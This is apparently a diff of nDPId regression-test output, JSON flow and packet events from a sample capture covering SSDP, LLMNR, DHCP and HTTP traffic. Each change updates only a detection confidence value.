{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1470104382242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382242,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfYYAAAERhhrAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104382448,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104382448,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed0AAAERmP3AqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104382448,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCesAAAQR9onAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1470104382857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104382857,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1470104382858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104382858,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed8AAAERmPvAqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1470104383675,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104383675,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLYAAAQRv8DAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1470104383810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104383810,"pkt":"TF4M6gNlYMVHBbyMCABFAAFI+0MAAEARgP\/AqAUQwKh3AQBEAEMBNFvxAQEGABeXwMwAAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} -00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} +00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1470104383815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104383815,"pkt":"ABxCjnAxTF4M6gNlCABFAAFIAAAAABARrEPAqHcBwKgFEABDAEQBNHbOAgEGABeXwMwAAAAAwKgFEMCoBRDAqHcBAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} 
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1470104384085,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104384085,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEMAAAER2QfAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1470104384289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104384289,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFAAAAER7zTAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
@@ -263,7 +263,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} 
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"thread_ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="} 
